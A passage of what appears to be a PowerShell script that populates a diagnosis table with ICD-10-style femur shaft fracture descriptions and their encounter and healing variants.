transverse fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left femur","Nondisplaced transverse fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified femur","Nondisplaced transverse fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right femur","Displaced oblique fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left femur","Displaced oblique fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified femur","Displaced oblique fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right femur","Nondisplaced oblique fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left femur","Nondisplaced oblique fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified femur","Nondisplaced oblique fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of right femur","Displaced spiral fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of left femur","Displaced spiral fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of unspecified femur","Displaced spiral fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of 